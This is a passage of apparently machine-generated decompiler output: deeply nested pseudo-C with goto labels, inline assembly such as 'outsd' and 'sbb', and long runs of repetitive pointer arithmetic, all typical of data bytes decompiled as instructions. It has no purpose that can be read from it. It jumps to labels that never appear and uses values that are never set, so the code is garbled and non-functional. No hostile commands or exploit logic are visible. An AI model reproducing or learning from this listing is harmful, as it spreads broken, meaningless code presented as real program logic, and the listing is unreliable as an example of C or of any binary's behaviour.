											 *_t768 =  *_t768 - _t768;
											 *_t1521 =  *_t1521 + _t1233;
											 *_t1521 =  *_t1521 + _t768;
											_t1184 = _t1183 + _t1521;
											_push(es);
											_t769 =  *_t1233;
											 *_t1581 =  *_t1581 + _t769;
											if( *_t1581 >= 0) {
												break;
											}
											 *_t769 =  *_t769 + _t769;
											_t1233 = _t1233 |  *_t769;
											 *_t769 =  *_t769 + _t769;
											_t1163 = _t769 |  *_t769;
											_t1521 = _t1521 + 1 +  *((intOrPtr*)(_t1184 - 0x3e));
											 *_t1163 =  *_t1163 + _t1163;
											_t1186 = _t1184 |  *(_t1594 - 0x58);
											 *_t1163 =  *_t1163 + _t1163;
											_t776 = _t1163 + 2;
											if(_t776 < 0) {
												L104:
												_t777 = _t776 + _t1186;
												 *_t1521 =  *_t1521 + _t1233;
												 *_t777 =  *_t777 + _t777;
												L105:
												 *_t1233 =  *_t1233 + _t777;
												asm("adc [eax], al");
												 *_t1521 =  *_t1521 + _t777;
												 *_t1233 =  *_t1233 + _t777;
												 *0xa00 =  *0xa00 + _t777;
												 *_t777 =  *_t777 + _t777;
												asm("adc esi, [eax]");
												_t775 = _t777 +  *_t777;
											} else {
												_t775 = _t776 +  *_t776;
												if(_t775 >= 0) {
													_t1183 = _t1186 +  *((intOrPtr*)(_t1186 - 0x57));
													 *_t775 =  *_t775 + _t775;
													_t765 = _t775 + 0x73;
													 *_t1521 =  *_t1521 + _t1233;
													if( *_t1521 >= 0) {
														continue;
													} else {
														 *_t765 =  *_t765 + _t765;
														_t769 = _t765 + 2;
														 *((intOrPtr*)(_t1594 + 1)) =  *((intOrPtr*)(_t1594 + 1)) - _t1521;
														 *_t1581 =  *_t1581 + _t769;
														 *_t1521 =  *_t1521 + _t1233;
														 *_t769 =  *_t769 + _t769;
														 *_t1183 = _t1183 +  *_t1183;
														 *_t1521 =  *_t1521 ^ _t769;
														 *_t1233 =  *_t1233 + _t1521;
														 *_t769 =  *_t769 + _t769;
														break;
													}
												}
											}
											_t1521 = _t1521 +  *((intOrPtr*)(_t1186 + 0x4a));
											 *_t775 =  *_t775 + _t775;
											_t1233 = _t1233 | _t1541[0x1d];
											_t1681 = _t1233;
											while(1) {
												asm("outsd");
												if(_t1681 <= 0) {
													 *_t1581 =  *_t1581 + _t775;
												}
												_push(es);
												 *_t1521 =  *_t1521 + _t775;
												if( *_t1521 >= 0) {
													break;
												}
												 *_t775 =  *_t775 + _t775;
												_t1234 = _t1233 | _t1541[0x1e];
												 *_t775 =  *_t775 + _t775;
												_push(es);
												 *_t1521 =  *_t1521 + _t775;
												if( *_t1521 >= 0) {
													L118:
													_t1235 = _t1234 |  *(_t1541 - 0x79);
													 *_t775 =  *_t775 + _t775;
													_push(es);
													 *_t1521 =  *_t1521 + _t775;
													_t1692 =  *_t1521;
													goto L119;
												} else {
													 *_t775 =  *_t775 + _t775;
													_t1235 = _t1234 | _t1541[0x1e];
													 *_t775 =  *_t775 + _t775;
													_push(es);
													 *_t1521 =  *_t1521 + _t775;
													if( *_t1521 >= 0) {
														L121:
														_push(es);
														asm("outsd");
														asm("les eax, [eax]");
														 *_t1521 =  *_t1521 + _t1235;
														 *_t1521 =  *_t1521 + _t775;
														 *_t1581 =  *_t1581 - _t1235;
														 *_t1521 =  *_t1521 + _t1235;
														 *_t1521 =  *_t1521 + _t775;
														asm("outsd");
														if( *_t1521 > 0) {
															 *_t1581 =  *_t1581 + _t775;
														}
														_push(es);
														 *_t775 =  *_t775 & _t1186;
														 *_t775 =  *_t775 + _t775;
														goto L124;
													} else {
														 *_t775 =  *_t775 + _t775;
														_t1233 = _t1235 | _t1541[0x1f];
														 *_t775 =  *_t775 + _t775;
														_push(es);
														 *_t1521 =  *_t1521 + _t775;
														if( *_t1521 >= 0) {
															goto L105;
														} else {
															 *_t775 =  *_t775 + _t775;
															_t1235 = _t1233 | _t1541[0x1f];
															 *_t775 =  *_t775 + _t775;
															_push(es);
															 *_t1521 =  *_t1521 + _t775;
															if( *_t1521 >= 0) {
																L124:
																 *_t775 =  *_t775 + _t775;
																_pop(ds);
																_t1521 = _t1521 ^  *(_t1186 + 0x52);
																 *_t775 =  *_t775 + _t775;
																_t1236 = _t1235 | _t1541[0x14];
																 *_t775 =  *_t775 + _t775;
																goto L125;
															} else {
																 *_t775 =  *_t775 + _t775;
																_t1236 = _t1235 |  *(_t1541 - 0x7f);
																 *_t775 =  *_t775 + _t775;
																_push(es);
																 *_t1521 =  *_t1521 + _t775;
																if( *_t1521 >= 0) {
																	L125:
																	 *_t1521 =  *_t1521 + _t1236;
																	 *_t1521 =  *_t1521 + _t775;
																	asm("outsd");
																	if( *_t1521 > 0) {
																		 *_t1581 =  *_t1581 + _t775;
																		_t1699 =  *_t1581;
																	}
																	_push(es);
																	if(_t1699 < 0) {
																		goto L134;
																	} else {
																		 *_t775 = es;
																		if(_t1699 < 0) {
																			goto L138;
																		} else {
																			_push(_t1599);
																			 *_t775 =  *_t775 + _t775;
																			_t775 = _t775 |  *_t775;
																			_t1239 = _t1236 + _t1541[0x1d];
																			 *_t775 =  *_t775 + _t775;
																			goto L130;
																		}
																	}
																} else {
																	 *_t775 =  *_t775 + _t775;
																	_t1233 = _t1236 |  *(_t1541 - 0x7d);
																	 *_t775 =  *_t775 + _t775;
																	_push(es);
																	 *_t1521 =  *_t1521 + _t775;
																	if( *_t1521 >= 0) {
																		continue;
																	} else {
																		 *_t775 =  *_t775 + _t775;
																		_t1239 = _t1233 |  *(_t1541 - 0x7b);
																		 *_t775 =  *_t775 + _t775;
																		_push(es);
																		 *_t1521 =  *_t1521 + _t775;
																		if( *_t1521 >= 0) {
																			L130:
																			ds = es;
																			_t1186 = _t1186 - 1;
																			_pop(ds);
																			_pop(ss);
																			if(_t1186 >= 0) {
																				L135:
																				 *_t1521 =  *_t1521 + _t775;
																				asm("outsd");
																				if( *_t1521 >= 0) {
																					 *_t1581 =  *_t1581 + _t775;
																					_t1707 =  *_t1581;
																				}
																				_push(es);
																				if(_t1707 < 0) {
																					goto L147;
																				} else {
																					L138:
																					 *_t775 = es;
																					if(_t1707 < 0) {
																						goto L151;
																					} else {
																						_push(_t1599);
																						goto L140;
																					}
																				}
																			} else {
																				 *_t775 =  *_t775 + _t775;
																				 *_t775 =  *_t775 + _t775;
																				_t1161 = _t775 |  *_t775;
																				 *_t1161 =  *_t1161 + _t1161;
																				ds = es;
																				 *_t1161 =  *_t1161 + _t1161;
																				_t775 = _t1161 |  *_t1161;
																				_t1235 = ((_t1239 | _t1541[0x15]) + _t1541[0x1d] | _t1541[0x15]) + _t1541[0x1d];
																				 *_t775 =  *_t775 + _t775;
																				_push(es);
																				if( *_t775 < 0) {
																					L119:
																					asm("outsd");
																					if(_t1692 >= 0) {
																						 *_t1581 =  *_t1581 + _t775;
																					}
																					goto L121;
																				} else {
																					 *_t775 =  *_t775 | _t775;
																					if( *_t775 < 0) {
																						L141:
																						if(_t1708 == 0) {
																							 *_t1581 =  *_t1581 + _t1160;
																						}
																						_push(es);
																						 *_t1160 =  *_t1160 & _t1186;
																						 *_t1160 =  *_t1160 + _t1160;
																						 *_t1541 =  *_t1541 + _t1186;
																						_t1521 = _t1521 |  *(_t1186 + 0x52);
																						 *_t1160 =  *_t1160 + _t1160;
																						 *_t1160 =  *_t1160 + _t1160;
																						_t775 = _t1160 |  *_t1160;
																						_t1239 = (_t1506 | _t1541[0x14]) + _t1541[0x1e];
																						 *_t775 =  *_t775 + _t775;
																						_t1710 =  *_t775;
																						_push(es);
																						L144:
																						if(_t1710 < 0) {
																							L158:
																							_push(_t1599);
																							 *_t775 =  *_t775 + _t775;
																							_t1152 = _t775 |  *_t775;
																							_t1495 = _t1239 + _t1541[0x1f];
																							_t1720 = _t1495;
																							goto L159;
																						} else {
																							 *_t775 = es;
																							if(_t1710 < 0) {
																								L159:
																								if(_t1720 >= 0) {
																									 *_t1581 =  *_t1581 + _t775;
																								}
																								ds = es;
																								_t1186 = _t1186 - 1;
																								_pop(ds);
																								_pop(ss);
																								if(_t1186 >= 0) {
																									goto L170;
																								} else {
																									 *_t1152 =  *_t1152 + _t1152;
																									_t1496 = _t1495 | _t1541[0x15];
																									 *_t1152 =  *_t1152 + _t1152;
																									_t1153 = _t1152 |  *_t1152;
																									goto L163;
																								}
																							} else {
																								_push(_t1599);
																								 *_t775 =  *_t775 + _t775;
																								_t775 = _t775 |  *_t775;
																								L147:
																								 *_t1521 =  *_t1521 + _t775;
																								asm("outsd");
																								if( *_t1521 == 0) {
																									 *_t1581 =  *_t1581 + _t775;
																								}
																								ds = es;
																								_t1186 = _t1186 - 1;
																								_pop(ds);
																								_pop(ss);
																								if(_t1186 >= 0) {
																									L157:
																									if(_t1719 < 0) {
																										goto L171;
																									} else {
																										goto L158;
																									}
																								} else {
																									 *_t775 =  *_t775 + _t775;
																									 *_t775 =  *_t775 + _t775;
																									_t775 = _t775 |  *_t775;
																									_t1239 = (_t1239 | _t1541[0x15]) + _t1541[0x1e];
																									L151:
																									 *_t775 =  *_t775 + _t775;
																									_push(es);
																									asm("sbb eax, 0x576f");
																									_t1155 = _t775 |  *_t775;
																									_t1498 = _t1239 + _t1541[0x1e];
																									 *_t1155 =  *_t1155 + _t1155;
																									_t1716 =  *_t1155;
																									_push(es);
																									if(_t1716 < 0) {
																										L140:
																										 *_t1155 =  *_t1155 + _t1155;
																										_t1157 = _t1155 |  *_t1155;
																										 *_t1157 =  *_t1157 + _t1157;
																										_push(es);
																										 *_t1521 =  *_t1521 & _t1186;
																										_t1158 = _t1157 +  *_t1157;
																										 *_t1158 =  *_t1158 + _t1158;
																										asm("out dx, eax");
																										 *_t1158 =  *_t1158 + _t1158;
																										 *((intOrPtr*)(_t1186 + 0x55)) =  *((intOrPtr*)(_t1186 + 0x55)) + _t1521;
																										 *_t1158 =  *_t1158 + _t1158;
																										 *_t1158 =  *_t1158 + _t1158;
																										_t1159 = _t1158 |  *_t1158;
																										 *_t1159 =  *_t1159 + _t1159;
																										ds = es;
																										_t1541[0x15] = _t1541[0x15] | _t1594;
																										 *_t1159 =  *_t1159 + _t1159;
																										_t1160 = _t1159 |  *_t1159;
																										_t1506 = (_t1498 + _t1541[0x1e] | _t1541[0x15]) + _t1541[0x1e] + _t1541[0x1e];
																										_t1708 = _t1506;
																										goto L141;
																									} else {
																										 *_t1155 = es;
																										if(_t1716 < 0) {
																											L166:
																											if(_t1725 >= 0) {
																												 *_t1581 =  *_t1581 + _t1155;
																											}
																											goto L168;
																										} else {
																											_pop(_t1186);
																											 *_t1155 =  *_t1155 + _t1155;
																											_t782 = _t1155 |  *_t1155;
																											_t1243 = _t1498 + _t1541[0x1e];
																											 *_t782 =  *_t782 + _t782;
																											ss = es;
																											L154:
																											asm("outsd");
																											_pop(_t1599);
																											 *_t782 =  *_t782 + _t782;
																											_t1154 = _t782 |  *_t782;
																											_t1498 = _t1243 + _t1541[0x1f];
																											 *_t1154 =  *_t1154 + _t1154;
																											_push(es);
																											_t1155 = _t1154 & _t1154;
																											 *_t1155 =  *_t1155 + _t1155;
																											 *_t1581 =  *_t1581 + _t1186;
																											if( *_t1581 >= 0) {
																												L168:
																												ss = es;
																												asm("outsd");
																												_pop(_t1599);
																												 *_t1155 =  *_t1155 + _t1155;
																												_t1156 = _t1155 |  *_t1155;
																												 *_t1156 =  *_t1156 + _t1156;
																												ds = es;
																												 *_t1541 =  *_t1541 ^ _t1186;
																												_t1521 = _t1521 |  *(_t1186 + 0x52);
																												 *_t1156 =  *_t1156 + _t1156;
																												 *_t1156 =  *_t1156 + _t1156;
																												_t1153 = _t1156 |  *_t1156;
																												_t1496 = (_t1498 + _t1541[0x1f] | _t1541[0x14]) + _t1541[0x1f];
																												 *_t1153 =  *_t1153 + _t1153;
																												_t1727 =  *_t1153;
																												_push(es);
																												if(_t1727 < 0) {
																													L163:
																													 *_t1153 =  *_t1153 + _t1153;
																													_push(es);
																													_push(ds);
																													asm("outsd");
																													_push(_t1541);
																													 *_t1153 =  *_t1153 + _t1153;
																													_t782 = _t1153 |  *_t1153;
																													_t1243 = _t1496 + _t1541[0x1f] + _t1541[0x1f];
																													 *_t782 =  *_t782 + _t782;
																													_t1724 =  *_t782;
																													_push(es);
																													if(_t1724 < 0) {
																														goto L154;
																													} else {
																														 *_t782 = es;
																														if(_t1724 < 0) {
																															goto L172;
																														} else {
																															_pop(_t1186);
																															 *_t782 =  *_t782 + _t782;
																															_t1155 = _t782 |  *_t782;
																															_t1498 = _t1243 + _t1541[0x1f];
																															_t1725 = _t1498;
																															goto L166;
																														}
																													}
																												} else {
																													 *_t1153 = es;
																													if(_t1727 < 0) {
																														L176:
																														_t1151 = _t1150 |  *_t1150;
																														 *_t1151 =  *_t1151 + _t1151;
																														_push(es);
																														asm("sbb ebp, [edi+0x57]");
																														 *_t1151 =  *_t1151 + _t1151;
																														_t784 = _t1151 |  *_t1151;
																														_t1245 = _t1493 +  *((intOrPtr*)(_t1541 - 0x80)) +  *((intOrPtr*)(_t1541 - 0x80));
																														 *_t784 =  *_t784 + _t784;
																														_t1734 =  *_t784;
																														_push(es);
																														if(_t1734 < 0) {
																															goto L173;
																														} else {
																															 *_t784 = es;
																															if(_t1734 < 0) {
																																goto L189;
																															} else {
																																_pop(_t1245);
																																goto L179;
																															}
																														}
																													} else {
																														L170:
																														_push(_t1599);
																														 *_t1152 =  *_t1152 + _t1152;
																														_t775 = _t1152 |  *_t1152;
																														_t1239 = _t1495 + _t1541[0x1f];
																														 *_t775 =  *_t775 + _t775;
																														L171:
																														 *_t1581 =  *_t1581 + _t775;
																														 *(_t775 + 0x1f000000) =  *(_t775 + 0x1f000000) & _t775;
																														asm("adc al, 0x73");
																														_push(_t1594);
																														 *_t775 =  *_t775 + _t775;
																														 *_t775 =  *_t775 + _t775;
																														_t779 = _t775 |  *_t775;
																														 *_t779 =  *_t779 + _t779;
																														_push(es);
																														asm("sbb al, 0x6f");
																														 *_t779 =  *_t779 + _t779;
																														 *(_t779 |  *_t779) =  *(_t779 |  *_t779) + (_t779 |  *_t779);
																														ss = es;
																														asm("outsd");
																														_t781 = _t1541;
																														 *_t781 =  *_t781 + _t781;
																														_t782 = _t781 |  *_t781;
																														_t1243 = (_t1239 | _t1541[0x15]) + _t1541[0x1f] +  *((intOrPtr*)(_t1541 - 0x80)) +  *((intOrPtr*)(_t1541 - 0x80));
																														 *_t782 =  *_t782 + _t782;
																														L172:
																														_push(es);
																														asm("sbb bl, [edi]");
																														_t783 = _t782 | 0x00005273;
																														 *_t783 =  *_t783 + _t783;
																														_t784 = _t783 |  *_t783;
																														_t1245 = (_t1243 | _t1541[0x14]) +  *((intOrPtr*)(_t1541 - 0x80));
																														L173:
																														 *_t784 =  *_t784 + _t784;
																														_push(es);
																														if( *_t784 < 0) {
																															L179:
																															 *_t784 =  *_t784 + _t784;
																															 *(_t784 |  *_t784) =  *(_t784 |  *_t784) + (_t784 |  *_t784);
																															ss = es;
																															asm("outsd");
																															_pop(_t786);
																															 *_t786 =  *_t786 + _t786;
																															_t787 = _t786 |  *_t786;
																															_t1247 = _t1245 +  *((intOrPtr*)(_t1541 - 0x7e)) +  *((intOrPtr*)(_t1541 - 0x7e));
																															 *_t787 =  *_t787 + _t787;
																															_push(es);
																															asm("sbb bl, [edi]");
																															asm("aaa");
																															if( *_t787 >= 0) {
																																goto L189;
																															} else {
																																 *_t787 =  *_t787 + _t787;
																																 *_t787 =  *_t787 + _t787;
																																_t1144 = _t787 |  *_t787;
																																_t1483 = (_t1247 | _t1541[0x14]) +  *((intOrPtr*)(_t1541 - 0x7e));
																																 *_t1144 =  *_t1144 + _t1144;
																																_push(es);
																																if( *_t1144 < 0) {
																																	goto L185;
																																} else {
																																	 *_t1144 =  *_t1144 | _t1144;
																																	if( *_t1144 < 0) {
																																		goto L192;
																																	} else {
																																		_push(_t1599);
																																		 *_t1144 =  *_t1144 + _t1144;
																																		_t1147 = _t1144 |  *_t1144;
																																		goto L183;
																																	}
																																}
																															}
																														} else {
																															 *_t784 =  *_t784 | _t784;
																															if( *_t784 < 0) {
																																L184:
																																ds = es;
																																_t1186 = _t1186 -  *_t1541;
																																_t1144 = _t1147 | 0x00005573;
																																_t1483 = _t1245 | _t1541[0x15];
																																 *_t1144 =  *_t1144 + _t1144;
																																L185:
																																_t1148 = _t1144 |  *_t1144;
																																 *_t1148 =  *_t1148 + _t1148;
																																_push(es);
																																asm("sbb ebp, [edi+0x57]");
																																 *_t1148 =  *_t1148 + _t1148;
																																_t1147 = _t1148 |  *_t1148;
																																_t1479 = _t1483 +  *((intOrPtr*)(_t1541 - 0x7e)) +  *((intOrPtr*)(_t1541 - 0x7e));
																																 *_t1147 =  *_t1147 + _t1147;
																																_t1741 =  *_t1147;
																																_push(es);
																																if(_t1741 < 0) {
																																	L183:
																																	_t1245 = _t1479 +  *((intOrPtr*)(_t1541 - 0x7e));
																																	 *_t1147 =  *_t1147 + _t1147;
																																	goto L184;
																																}
																																 *_t1147 = es;
																																if(_t1741 < 0) {
																																	L194:
																																	_t1749 =  *(_t1147 + _t1147 + 0x546f70) & 0x00000000;
																																} else {
																																	_pop(_t1491);
																																	 *_t1147 =  *_t1147 + _t1147;
																																	_t787 = _t1147 |  *_t1147;
																																	_t1247 = _t1491 +  *((intOrPtr*)(_t1541 - 0x7c));
																																	L188:
																																	asm("outsd");
																																	 *_t1581 =  *_t1581 + _t787;
																																	L189:
																																	ds = es;
																																	 *_t1541 =  *_t1541 ^ _t1186;
																																	_t788 = _t787 ^ 0x00000073;
																																	_push(_t1521);
																																	 *_t788 =  *_t788 + _t788;
																																	 *_t788 =  *_t788 + _t788;
																																	_t787 = _t788 |  *_t788;
																																	_t1247 = (_t1247 | _t1541[0x14]) +  *((intOrPtr*)(_t1541 - 0x7c));
																																	 *_t787 =  *_t787 + _t787;
																																	_t1745 =  *_t787;
																																	_push(es);
																																	if(_t1745 < 0) {
																																		goto L188;
																																	}
																																	 *_t787 = es;
																																	if(_t1745 < 0) {
																																		asm("outsd");
																																		_push(_t1541);
																																		 *_t787 =  *_t787 + _t787;
																																		_t789 = _t787 |  *_t787;
																																		_t1249 = _t1247 +  *((intOrPtr*)(_t1541 - 0x7a));
																																		 *_t789 =  *_t789 + _t789;
																																		_t1752 =  *_t789;
																																		_push(es);
																																		if(_t1752 < 0) {
																																			L201:
																																			ss = es;
																																			asm("outsd");
																																			_pop(_t1599);
																																			 *_t789 =  *_t789 + _t789;
																																			_t791 = (_t789 |  *_t789) +  *_t1521;
																																			 *_t791 =  *_t791 + _t791;
																																			asm("rol byte [eax+0x22], 0x0");
																																			_t165 = _t791 + 0x41;
																																			 *_t165 =  *((intOrPtr*)(_t791 + 0x41)) + _t1521;
																																			if( *_t165 < 0) {
																																				 *_t791 =  *_t791 + _t791;
																																				_t1479 = _t1249 |  *_t791;
																																				asm("outsd");
																																				 *_t791 =  *_t791 + _t791;
																																				_t1136 = _t791 |  *_t791;
																																				_t1521 = _t1521 +  *_t1541;
																																				 *_t1136 =  *_t1136 - _t1521;
																																				 *_t1521 =  *_t1521 + _t1479;
																																				 *_t1521 =  *_t1521 + _t1136;
																																				 *(_t1521 + _t1136) =  *(_t1521 + _t1136) & _t1136;
																																				_t1137 = _t1136 +  *_t1136;
																																				 *_t1137 =  *_t1137 + _t1137;
																																				_pop(_t1541);
																																				 *_t1137 =  *_t1137 + _t1137;
																																				 *((intOrPtr*)(_t1186 + 0x55)) =  *((intOrPtr*)(_t1186 + 0x55)) + _t1521;
																																				_push(_t1594);
																																				 *_t1137 =  *_t1137 + _t1137;
																																				_t1480 = _t1479 |  *_t1137;
																																				if (_t1480 < 0) goto L205;
																																				 *_t1521 =  *_t1521 + _t1480;
																																				 *_t1521 =  *_t1521 + _t1137;
																																				 *_t1541 =  *_t1541 - _t1480;
																																				 *_t1521 =  *_t1521 + _t1480;
																																				 *_t1137 =  *_t1137 + _t1137;
																																				_push(es);
																																				asm("outsd");
																																				_push(_t1137);
																																				 *_t1137 =  *_t1137 + _t1137;
																																				_t1138 = _t1137 |  *_t1137;
																																				_t1482 = _t1480 + _t1541[0x1d] +  *_t1138;
																																				_t1577 = _t1541 - 1;
																																				 *_t1138 =  *_t1138 + _t1138;
																																				_t1139 = _t1138 |  *_t1521;
																																				asm("outsd");
																																				if(_t1139 >= 0) {
																																					 *_t1581 =  *_t1581 + _t1139;
																																				}
																																				_push(es);
																																				asm("outsd");
																																				_push(_t1139);
																																				 *_t1139 =  *_t1139 + _t1139;
																																				_t789 = _t1139 |  *_t1139;
																																				_t1249 = _t1482 +  *_t789;
																																				_t1541 = _t1577 - 1;
																																				 *_t789 =  *_t789 + _t789;
																																				goto L208;
																																			}
																																		} else {
																																			if(_t1752 < 0) {
																																				L208:
																																				_t1140 = _t789 |  *_t1521;
																																				asm("outsd");
																																				if(_t1140 == 0) {
																																					 *_t1581 =  *_t1581 + _t1140;
																																				}
																																				_push(es);
																																				asm("outsd");
																																				_push(_t1140);
																																				 *_t1140 =  *_t1140 + _t1140;
																																				_t1141 = _t1140 |  *_t1140;
																																				_t1249 = _t1249 +  *_t1141;
																																				_t1541 = _t1541 - 1;
																																				 *_t1141 =  *_t1141 + _t1141;
																																				asm("outsd");
																																				_t1143 =  *_t1249;
																																				 *_t1249 = _t1141 |  *_t1521;
																																				 *_t1581 =  *_t1581 + _t1143;
																																				asm("outsd");
																																				_push(_t1143);
																																				 *_t1143 =  *_t1143 + _t1143;
																																				_t791 = _t1143 |  *_t1143;
																																			} else {
																																				_pop(_t1186);
																																				 *_t789 =  *_t789 + _t789;
																																				_t789 = _t789 |  *_t789;
																																				_t1249 = _t1249 +  *((intOrPtr*)(_t1541 - 0x7a));
																																				 *_t789 =  *_t789 + _t789;
																																				goto L201;
																																			}
																																		}
																																	} else {
																																		_push(_t1599);
																																		 *_t787 =  *_t787 + _t787;
																																		_t1144 = _t787 |  *_t787;
																																		_t1483 = _t1247 +  *((intOrPtr*)(_t1541 - 0x7c));
																																		 *_t1144 =  *_t1144 + _t1144;
																																		_push(es);
																																		 *(_t1144 + 0x1f000000) =  *(_t1144 + 0x1f000000) & _t1144;
																																		asm("adc al, 0x73");
																																		_push(_t1594);
																																		 *_t1144 =  *_t1144 + _t1144;
																																		L192:
																																		 *_t1144 =  *_t1144 + _t1144;
																																		_t1145 = _t1144 |  *_t1144;
																																		 *_t1145 =  *_t1145 + _t1145;
																																		_push(es);
																																		asm("sbb al, 0x6f");
																																		_push(_t1541);
																																		 *_t1145 =  *_t1145 + _t1145;
																																		_t1146 = _t1145 |  *_t1145;
																																		 *_t1146 =  *_t1146 + _t1146;
																																		_push(es);
																																		_t1147 = _t1146 & _t1146;
																																		 *_t1147 =  *_t1147 + _t1147;
																																		 *_t1541 =  *_t1541 + _t1186;
																																		_t1521 = _t1521 ^  *(_t1186 + 0x52);
																																		 *_t1147 =  *_t1147 + _t1147;
																																		_t1487 = (_t1483 | _t1541[0x15]) +  *((intOrPtr*)(_t1541 - 0x7c)) +  *((intOrPtr*)(_t1541 - 0x7a)) | _t1541[0x14];
																																		 *_t1147 =  *_t1147 + _t1147;
																																		_t1147 = _t1147 |  *_t1147;
																																		_t1487 = _t1487 +  *((intOrPtr*)(_t1541 - 0x7a));
																																		 *_t1147 =  *_t1147 + _t1147;
																																		_push(es);
																																		if ( *_t1147 < 0) goto L193;
																																		goto L194;
																																	}
																																}
																															} else {
																																_push(_t1599);
																																 *_t784 =  *_t784 + _t784;
																																_t1149 = _t784 |  *_t784;
																																 *_t1149 =  *_t1149 + _t1149;
																																ds = es;
																																 *_t1541 =  *_t1541 ^ _t1186;
																																_t1150 = _t1149 | 0x00005573;
																																_t1493 = _t1245 +  *((intOrPtr*)(_t1541 - 0x80)) | _t1541[0x15];
																																 *_t1150 =  *_t1150 + _t1150;
																																goto L176;
																															}
																														}
																													}
																												}
																											} else {
																												 *_t1155 =  *_t1155 + _t1155;
																												 *_t1155 =  *_t1155 + _t1155;
																												_t775 = _t1155 |  *_t1155;
																												_t1239 = (_t1498 | _t1541[0x14]) + _t1541[0x1f];
																												 *_t775 =  *_t775 + _t775;
																												_t1719 =  *_t775;
																												_push(es);
																												if(_t1719 < 0) {
																													goto L144;
																												} else {
																													 *_t775 = es;
																													goto L157;
																												}
																											}
																										}
																									}
																								}
																							}
																						}
																					} else {
																						_pop(_t1186);
																						 *_t775 =  *_t775 + _t775;
																						_t1162 = _t775 |  *_t775;
																						_t1236 = _t1235 + _t1541[0x1d];
																						 *_t1162 =  *_t1162 + _t1162;
																						ss = es;
																						asm("outsd");
																						_pop(_t1599);
																						 *_t1162 =  *_t1162 + _t1162;
																						_t775 = _t1162 |  *_t1162;
																						L134:
																						 *_t775 =  *_t775 + _t775;
																						_push(es);
																						asm("sbb [edi-0x3b], ch");
																						 *_t775 =  *_t775 + _t775;
																						_t778 = _t775 |  *_t775;
																						 *_t778 =  *_t778 + _t778;
																						_push(es);
																						asm("sbb eax, 0x5273651f");
																						 *_t778 =  *_t778 + _t778;
																						_t1239 = _t1236 + _t1541[0x1e] + _t1541[0x1e] | _t1541[0x14];
																						 *_t778 =  *_t778 + _t778;
																						_t775 = _t778 |  *_t778;
																						goto L135;
																					}
																				}
																			}
																		} else {
																			 *_t775 =  *_t775 + _t775;
																			goto L118;
																		}
																	}
																}
															}
														}
													}
												}
												 *_t1521 =  *_t1521 + _t791;
												 *_t1541 =  *_t1541 - _t1249;
												 *_t1521 =  *_t1521 + _t1249;
												 *_t791 =  *_t791 + _t791;
												_push(es);
												asm("outsd");
												_push(_t791);
												 *_t791 =  *_t791 + _t791;
												_t792 = _t791 |  *_t791;
												_t1251 = _t1249 +  *((intOrPtr*)(_t1541 - 0x7c)) +  *_t792;
												_t1542 = _t1541 - 1;
												 *_t792 =  *_t792 + _t792;
												_t793 = _t792 |  *_t1521;
												asm("outsd");
												if(_t793 >= 0) {
													 *_t1581 =  *_t1581 + _t793;
												}
												_push(es);
												asm("outsd");
												_push(_t793);
												 *_t793 =  *_t793 + _t793;
												_t794 = _t793 |  *_t793;
												_t1252 = _t1251 +  *_t794;
												 *_t794 =  *_t794 + _t794;
												_t795 = _t794 |  *_t1521;
												asm("outsd");
												 *_t1252 =  *_t1252;
												_push(es);
												asm("outsd");
												_push(_t795);
												 *_t795 =  *_t795 + _t795;
												_t796 = _t795 |  *_t795;
												_t1253 = _t1252 +  *_t796;
												_t1544 = _t1542;
												 *_t796 =  *_t796 + _t796;
												_t797 = _t796 |  *_t1521;
												asm("outsd");
												if(_t797 > 0) {
													 *_t1581 =  *_t1581 + _t797;
												}
												_push(es);
												asm("outsd");
												_push(_t797);
												 *_t797 =  *_t797 + _t797;
												_t798 = _t797 |  *_t797;
												_t1254 = _t1253 +  *_t798;
												_t1545 = _t1544 - 1;
												 *_t798 =  *_t798 + _t798;
												_t799 = _t798 |  *_t1521;
												asm("outsd");
												 *_t1254 =  *_t1254;
												_push(es);
												asm("outsd");
												_push(_t799);
												 *_t799 =  *_t799 + _t799;
												_t800 = _t799 |  *_t799;
												_t1522 = _t1521 +  *((intOrPtr*)(_t1521 + 0x22));
												if(_t1522 < 0) {
													 *_t800 =  *_t800 + _t800;
													_t802 = (_t800 |  *_t800) -  *_t1581;
													_t1187 = _t1186 +  *((intOrPtr*)(_t1186 - 0x61));
													 *_t802 =  *_t802 + _t802;
													_t803 = _t802 + 0x2b;
													 *_t1522 =  *_t1522 + _t1254;
													 *_t1187 =  *_t1187 + _t1522;
													 *_t1522 =  *_t1522 ^ _t803;
													 *_t1545 =  *_t1545 + _t1522;
													 *_t803 =  *_t803 + _t803;
													 *((intOrPtr*)(_t803 + _t803)) =  *((intOrPtr*)(_t803 + _t803)) + _t1254;
													 *_t1254 =  *_t1254 + _t1522;
													_t1188 = _t1187 + _t1522;
													_push(es);
													_t804 =  *_t1254;
													 *_t1581 =  *_t1581 + _t804;
													if( *_t1581 < 0) {
														 *_t804 =  *_t804 + _t804;
														_t1254 = _t1254 |  *_t1522;
														_t1186 = _t1188 +  *((intOrPtr*)(_t1188 - 0x61));
														 *_t804 =  *_t804 + _t804;
														_pop(es);
														_t1135 = _t804 + 0xb - 7;
														_pop(es);
														_push(es);
														asm("outsd");
														if (_t1135 >= 0) goto L225;
														 *_t1522 =  *_t1522 + _t1254;
														_t1123 = _t1135 +  *_t1186;
														if(_t1123 >= 0) {
															goto L217;
														} else {
															 *_t1123 =  *_t1123 + _t1123;
															L227:
															_t180 = _t1522 + _t1121;
															 *_t180 =  *((intOrPtr*)(_t1522 + _t1121)) + _t1121;
															if( *_t180 != 0) {
																goto L218;
															} else {
																 *_t1121 =  *_t1121 + _t1121;
																L229:
																 *((intOrPtr*)(_t1186 + _t1254)) =  *((intOrPtr*)(_t1186 + _t1254)) + _t1121;
																_pop(es);
																_t1122 = _t1121 - 7;
																_pop(es);
																_push(es);
																asm("outsd");
																if (_t1122 != 0) goto L230;
																 *_t1522 =  *_t1522 + _t1254;
																_t1123 = _t1122 -  *_t1581;
																_t1188 = _t1186 +  *[es:ebx-0x60];
																 *_t1123 =  *_t1123 + _t1123;
																 *_t1522 =  *_t1522 + _t1254;
																_t1125 = _t1123 + 0x0000002b &  *_t1522;
																_t1545 = _t1545 +  *((intOrPtr*)(_t1594 - 0x60));
																 *_t1125 =  *_t1125 + _t1125;
																_t804 = _t1125 + 0x2a;
															}
														}
													}
												} else {
													_push(_t1599);
													 *_t800 =  *_t800 + _t800;
													_t1123 = _t800 |  *_t800;
													L217:
													_t1522 = _t1522 +  *((intOrPtr*)(_t1522 + 0x22));
													_t1770 = _t1522;
													if (_t1770 < 0) goto L231;
													L218:
													asm("outsd");
												}
												 *_t804 =  *_t804 + _t804;
